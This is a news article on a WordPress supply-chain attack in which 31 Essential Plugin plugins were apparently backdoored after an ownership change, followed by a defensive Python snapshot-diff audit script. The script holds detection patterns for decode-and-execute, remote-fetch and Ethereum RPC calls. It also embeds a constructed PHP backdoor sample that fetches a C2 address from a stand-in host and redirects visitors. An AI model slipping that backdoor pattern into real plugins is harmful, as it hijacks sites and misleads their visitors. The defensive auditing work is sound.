Acting on a report from an alert user, a web developer has uncovered a set of WordPress plugins carrying hidden backdoors that had spread to thousands of WordPress sites.
The plugins all belong to the Essential Plugin portfolio and were reportedly backdoored after the portfolio quietly changed owners.
Austin Ginder, founder of Anchor Hosting, said the malicious changes sat dormant for about eight months, escaping early detection, so that many WordPress users installed the tainted plugins before the backdoor was switched on.
Rather than attacking websites directly, the perpetrators took over the plugins themselves, a textbook supply-chain attack. In response, WordPress has closed the affected plugins in its directory, halting any new installations.
Insights into the Malware’s Mechanism
The investigation began when a digital marketing agency passed Ginder an alert from one of the WordPress dashboards it manages. The resulting security audit uncovered a long-running campaign that had compromised 31 distinct WordPress plugins.
In a blog post, Ginder wrote that the flagged plugin, Countdown Timer Ultimate, contained code that could give an unauthorized third party access to any site running it. At the time, the plugin had more than 20,000 active installations.
He added that even after the plugin received a forced update from WordPress, the malicious code was still present.
By comparing snapshots of the plugin over time, Ginder established that it behaved legitimately until August 8, 2025.
Version 2.6.7, presented as a compatibility update for WordPress 6.8.2, added 191 lines of code that gave the attacker access to the sites running it.
Tracing the activity, Ginder found that an individual going by the alias Kris had bought the entire Essential Plugin portfolio for an undisclosed but six-figure sum. The original owners had listed the neglected portfolio for sale on Flippa.
The buyer's background in SEO, cryptocurrency, and online gambling matches the tactics seen in the attack.
Notably, all of the compromised Essential Plugin plugins obtained their command-and-control (C2) server address through an Ethereum smart contract. Because the address lives on a public blockchain rather than in the plugin code, the attacker can point the plugins at a new server whenever the old one is blocked; blocking the C2 host alone does not disable the backdoor, the plugin code itself has to go.
Ginder also found that the backdoor let the attacker redirect visitors to spam domains and scam pages without site administrators noticing.
Current Developments in the Incident
WordPress's Plugins Team has permanently closed all plugins in the Essential Plugin portfolio, which prevents new installations. Note that closing a plugin in the directory does not remove or deactivate copies already installed, so existing sites remain affected until their administrators act.
Ginder has also published the full list of the 31 affected plugins so that site owners and administrators can check whether any of them are installed.
The safest course is to remove these plugins and replace them. Ginder has also published a short guide to cleaning the installations for anyone who wants to keep using them; his blog lists the plugins he has been able to fix.
Erosion of Trust Rather Than Credentials
WordPress sites have long been targets for brute-force attacks, but attackers are increasingly turning to the platform's vast plugin ecosystem as a way in.
By buying popular, reputable plugins, attackers are effectively buying user trust, and their reach extends to every site that has installed them.

More troubling still, WordPress does not notify users when a plugin changes owners, so an attacker who acquires one can take it over silently and ship malware through a routine update without users' knowledge.
Because administrators often do not learn of a plugin compromise until the damage is done, site owners should audit their installed plugins regularly, at least monthly.
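As an added example (not code from Ginder's write-up or from any of the affected plugins), the following Python script shows the kind of snapshot comparison the investigation relied on and that a monthly audit can repeat: hash each plugin file against a known-good release, diff the changed files to pull out the added lines, and flag lines matching indicators of the behaviour described above (Ethereum JSON-RPC lookups, decode-and-execute calls, redirects, outbound fetches). The plugin name, file paths and the embedded PHP sample are constructed for illustration; the indicator patterns are heuristics, so hits are review leads rather than proof of compromise.

```python
"""Compare a WordPress plugin tree against a known-good snapshot and flag
suspicious additions. Added example, not code from the write-up or from the
plugins it describes; plugin name, paths and indicators are assumptions."""
import difflib
import hashlib
import re
from pathlib import Path

# Heuristic indicators of the behaviour the write-up describes: C2 lookup
# through an Ethereum smart contract, obfuscated payloads, visitor redirects,
# and outbound fetches. A hit is a lead for manual review, not a verdict.
INDICATORS = {
    "ethereum-rpc": re.compile(r"eth_call|eth_getStorageAt"),
    "decode-or-eval": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\("),
    "redirect": re.compile(r"wp_redirect\s*\(|header\s*\(\s*['\"]Location"),
    "remote-fetch": re.compile(r"wp_remote_(get|post)\s*\(|curl_exec\s*\(|file_get_contents\s*\(\s*['\"]https?:"),
}


def snapshot_dir(root: Path) -> dict[str, str]:
    """Read every .php file under root into {relative_path: source}."""
    return {
        str(p.relative_to(root)): p.read_text(encoding="utf-8", errors="replace")
        for p in sorted(root.rglob("*.php"))
    }


def file_hashes(files: dict[str, str]) -> dict[str, str]:
    """SHA-256 per file; record these from a trusted release for later comparison."""
    return {path: hashlib.sha256(src.encode()).hexdigest() for path, src in files.items()}


def changed_files(known_good: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Partition the current tree into added, removed and modified files."""
    good_h, cur_h = file_hashes(known_good), file_hashes(current)
    return {
        "added": sorted(set(cur_h) - set(good_h)),
        "removed": sorted(set(good_h) - set(cur_h)),
        "modified": sorted(p for p in set(good_h) & set(cur_h) if good_h[p] != cur_h[p]),
    }


def added_lines(old_src: str, new_src: str) -> list[str]:
    """Lines present in new_src but not in old_src (the 'extra lines' view)."""
    diff = difflib.unified_diff(old_src.splitlines(), new_src.splitlines(), lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


def flag_lines(lines: list[str]) -> list[tuple[str, str]]:
    """Return (indicator, line) pairs for every added line matching an indicator."""
    return [(name, line.strip()) for line in lines for name, rx in INDICATORS.items() if rx.search(line)]


def audit(known_good: dict[str, str], current: dict[str, str]) -> dict:
    """Full report: changed files, count of added lines, flagged lines per file."""
    changes = changed_files(known_good, current)
    report = {"changes": changes, "added_line_count": 0, "flags": {}}
    for path in changes["added"] + changes["modified"]:
        new = added_lines(known_good.get(path, ""), current[path])
        report["added_line_count"] += len(new)
        hits = flag_lines(new)
        if hits:
            report["flags"][path] = hits
    return report


# --- Constructed sample: a hypothetical plugin, not real code from any site --
GOOD_MAIN = """<?php
/*
Plugin Name: Example Timer (hypothetical)
Version: 1.0.0
*/
if ( ! defined( 'ABSPATH' ) ) { exit; }

function ex_timer_render( $atts ) {
    $seconds = absint( $atts['seconds'] ?? 60 );
    return '<div class="ex-timer" data-seconds="' . esc_attr( $seconds ) . '"></div>';
}
add_shortcode( 'ex_timer', 'ex_timer_render' );
"""

# Same file after a hypothetical malicious release: the appended block resolves
# a C2 address via an Ethereum JSON-RPC call and redirects anonymous visitors.
BAD_MAIN = GOOD_MAIN.replace("Version: 1.0.0", "Version: 1.0.1") + """
function ex_timer_c2() {
    $body = json_encode( array( 'jsonrpc' => '2.0', 'method' => 'eth_call', 'id' => 1,
        'params' => array( array( 'to' => '0x0000000000000000000000000000000000000000', 'data' => '0x' ), 'latest' ) ) );
    $resp = wp_remote_post( 'https://rpc.example.invalid', array( 'body' => $body ) );
    return base64_decode( wp_remote_retrieve_body( $resp ) );
}
add_action( 'template_redirect', function () {
    if ( ! is_user_logged_in() ) { wp_redirect( ex_timer_c2() ); exit; }
} );
"""

KNOWN_GOOD = {"example-timer/example-timer.php": GOOD_MAIN}
CURRENT = {"example-timer/example-timer.php": BAD_MAIN}

if __name__ == "__main__":
    import json
    print(json.dumps(audit(KNOWN_GOOD, CURRENT), indent=2))
```

Take the known-good snapshot from a trusted copy of the release (for instance one that predates the ownership change) rather than from the current install, feed real trees in through `snapshot_dir`, and run the comparison against every plugin on the published list of 31; any added line flagged as ethereum-rpc or decode-or-eval in a countdown widget deserves a close look.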
Source link: Techrepublic.com.